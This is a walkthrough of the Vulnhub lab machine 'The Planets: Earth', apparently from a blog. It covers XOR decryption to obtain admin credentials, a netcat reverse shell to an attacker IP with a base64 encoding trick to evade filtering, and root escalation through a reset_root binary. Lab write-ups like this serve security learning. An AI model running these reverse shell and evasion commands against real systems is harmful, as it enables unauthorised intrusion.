Image by Blake Cheek
Beri Contraster

The Planets: Earth Walkthrough - Vulnhub



Name: The Planets: Earth

Date release: 2 Nov 2021

Author: SirFlash

Series: The Planets

Difficulty: Easy


Welcome, reader. Today we'll pwn "The Planets: Earth" from Vulnhub. Let's start with an Nmap scan.


There is a Fedora web server running on port 443.


There was nothing on it. I also tried directory fuzzing, but no luck. I then checked the SSL certificate, and it revealed DNS names.


There are some encrypted messages on earth.local.


Another round of directory fuzzing on earth.local revealed some interesting directories.


Let's start with the /robots.txt file. Looking through it, I found another interesting file.


/testingnotes.txt revealed a username and the encryption algorithm used for the messages on earth.local.


It also says that testdata.txt was used to test encryption.


Time to do some decryption. I used CyberChef: I applied "From Hex" to the message and then "XOR" with the data from /testdata.txt as the key. This revealed the password for the user Terra. We can use these credentials to log in to the admin panel that we discovered in the dirb scan.
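
The "From Hex" then "XOR" step described above, written out as an added Python example (not part of the original post and not CyberChef's code). The key and message are constructed sample values, not the data from earth.local; the last function shows why the scheme is weak: one known plaintext/ciphertext pair gives back the key bytes.

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. The same call encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    # cycle() repeats the key when the message is longer than the key
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decrypt_hex_message(hex_message: str, key: bytes) -> bytes:
    """Hex-decode the message, then XOR it with the key (From Hex -> XOR)."""
    return xor_bytes(bytes.fromhex(hex_message.strip()), key)


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """ciphertext XOR plaintext = key bytes, for as long as the two overlap."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


# Constructed sample values (assumptions for this example only)
SAMPLE_KEY = b"sample test data published on the web server"
SAMPLE_SECRET = b"constructed-secret-123"
SAMPLE_HEX = xor_bytes(SAMPLE_SECRET, SAMPLE_KEY).hex()

if __name__ == "__main__":
    print("hex message :", SAMPLE_HEX)
    print("decrypted   :", decrypt_hex_message(SAMPLE_HEX, SAMPLE_KEY))
    leaked = recover_keystream(bytes.fromhex(SAMPLE_HEX), SAMPLE_SECRET)
    print("key leaked  :", leaked)
```

Publishing the key material next to the ciphertext, as the testing notes do, removes any protection XOR could have offered; an authenticated cipher with a secret, randomly generated key is the fix.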


After logging into the admin panel at http://earth.local/admin/login, I could execute commands on the system as the user Apache. Time to get a reverse shell.


I copied a reverse shell command from RevShells. It's a great source. Fire up your Netcat listener and enter the reverse shell command.


It failed because the remote connection is not allowed from the target machine. Let's try bypassing that by encoding our command in base64.


echo "nc -e /bin/bash 10.10.10.4 4444" | base64

Copy the output and execute it by decoding it and passing it to bash.


echo "copied shell" | base64 -d | bash

I successfully received a shell.



Let's do a shell upgrade. You can copy and paste the command from here.


Let's escalate our privileges to the root user. After doing some enumeration, I found an interesting file.



Further enumeration of the file showed that it's an executable file, but I couldn't execute it on the target machine.


It reports that the reset failed. We need to take a deeper look inside the file, so I moved it to my attacking machine using Netcat. We can't use the Python3 server because the remote connection is forbidden.


I used the ltrace tool to inspect the file. ltrace is a Linux debugging utility that traces the library calls a program makes. If you get a permission denied error, just make the file executable using chmod.


This executable file checks if those three files exist before resetting the root password. What we can do is create those three files at the same locations so that the executable resets the password.



Let's try executing the file reset_root now.


It successfully changed the root password to Earth. Thanks for reading. If you have any questions please don't hesitate to ask.


Happy Hacking!


